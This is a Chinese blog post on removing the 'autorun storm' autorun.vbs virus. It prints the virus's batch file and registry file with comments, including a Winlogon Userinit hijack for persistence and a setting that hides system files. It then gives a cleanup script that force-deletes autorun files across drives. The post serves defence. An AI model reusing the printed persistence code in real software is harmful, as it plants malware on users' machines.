zoukankan      html  css  js  c++  java

  • autorun.vbs病毒的清除办法

    症状:计算机里面出现一堆autorun为文件名称的文件,删除后出现找不到autorun.vbs的提示。我就打开当中的一个文件:Autorun.bat,内容例如以下:

    @echo off  //不显示系统提示符
    rem autorun风暴   //病毒名称:autorun风暴
    if exist ./autorun.reg regedit /s ./autorun.reg  //假设存在该文件夹下的autoun.reg注冊表文件写入注冊表
    if not "%1"=="" goto open   //注冊表文件导入成功,进入open标记处。
    if exist autorun.vbs start WScript.exe autorun.vbs&exit  //假设存在autorun.vbs,则使用WScript.exe将VBS文件执行,然后退出。
    if exist %SYSTEMROOT%/system32/autorun.vbs start WScript.exe %SYSTEMROOT%/system32/autorun.vbs&exit  //假设系统文件夹下的system32内有autorun.vbs,那么用WScript.exe执行VBS,然后退出。
    exit  //退出
    :open  //标记为open
    if not "%1"=="Open" goto next  //假设open成功,进入next标记
    start explorer ./   //開始当前文件夹
    exit  // 退出
    :next  //标记为netx
    if not "%1"=="Over" goto :next2  //假设标记不成功,进入next2标记
    if exist ./autorun.bin type ./autorun.bin >C:/autorun.txt&&exit   //假设当前文件夹存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
    if exist %SYSTEMROOT%/system32/autorun.bin type %SYSTEMROOT%/system32/autorun.bin >c:/autorun.txt&&exit  //假设系统文件夹system32下存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
    exit   //退出
    :next2     //标记为next2
    if "%1"=="-" attrib -s -a -h -r %2/autorun.*    //先标记全部autorun开头的文件为非系统、非仅仅读、非隐藏、非..文件
    if "%1"=="+" attrib +s +a +h +r %2/autorun.*  //先标记全部autorun开头的文件为系统、仅仅读、隐藏、..文件
    :end   //结束

    文件二:Autorun.reg

    Windows Registry Editor Version 5.00  //Windows 注冊表编辑器 5.00创建
    autorun风暴   //autorun风暴
    [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
    "Userinit"="userinit.exe,autorun.bat"   //在该条目下的userinit上加入一个autorun.bat运行文件。

    [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced]
    "ShowSuperHidden"=dword:00000000     //不显示隐藏文件。

    我倒,这个病毒还真有点搞笑,连杀毒说明书都写好了,只是,作者显然是个好学生,老师教的要写好凝视真的没错啊!

    杀毒方法:

    能够制作一个批处理文件来进行,内容例如以下:
    @echo on
    taskkill /im explorer.exe /f
    taskkill /im wscript.exe
    start reg add HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/EXplorer/Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
    start reg import kill.reg
    del c:/autorun.* /f /q /as
    del %SYSTEMROOT%/system32/autorun.* /f /q /as
    del d:/autorun.* /f /q /as
    del e:/autorun.* /f /q /as
    del f:/autorun.* /f /q /as
    你的盘符多就多写几个
    start explorer.exe

    运行它即可了。
  • 相关阅读:
    AI:IPPR的数学表示-CNN稀疏结构进化(Mobile、xception、Shuffle、SE、Dilated、Deformable)
    基于视觉的机械手控制
    远程图形界面:VncServer与KDE桌面远程连接
    远程图形界面:使用putty+xmin远程登录ubuntu-kde
    CUDA 显存操作:CUDA支持的C++11
    C++11:using 的各种作用
    C++ 模板template和template
    Detectron:Pytorch-Caffe2-Detectron的一些跟进
    TF实战:(Mask R-CNN原理介绍与代码实现)-Chapter-8
    The type javax.servlet.http.HttpServletRequest cannot be resolved.
  • 原文地址:https://www.cnblogs.com/mfrbuaa/p/4492216.html
Copyright © 2011-2022 走看看